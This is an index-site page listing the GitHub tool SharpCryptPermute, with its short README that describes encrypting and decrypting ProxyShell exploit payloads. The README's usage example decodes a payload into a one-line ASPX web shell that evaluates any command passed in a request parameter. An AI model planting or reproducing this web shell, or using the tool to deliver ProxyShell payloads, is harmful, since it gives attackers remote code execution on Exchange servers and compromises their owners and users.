Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/uknowsec/SharpCryptPermute

Crypt/Decrypt Proxyshell Payload
https://github.com/uknowsec/SharpCryptPermute

Last synced: about 1 month ago
JSON representation

Crypt/Decrypt Proxyshell Payload

Awesome Lists containing this project

README

        

# SharpCryptPermute
Crypt/Decrypt Proxyshell Payload

```
>SharpCryptPermute.exe -enc aaa.aspx
[+] Encrypt String:
ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ

>SharpCryptPermute.exe -dec ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ
[+] Decrypt String:
function Page_Load(){eval(Request['cmd'],'unsafe');}
```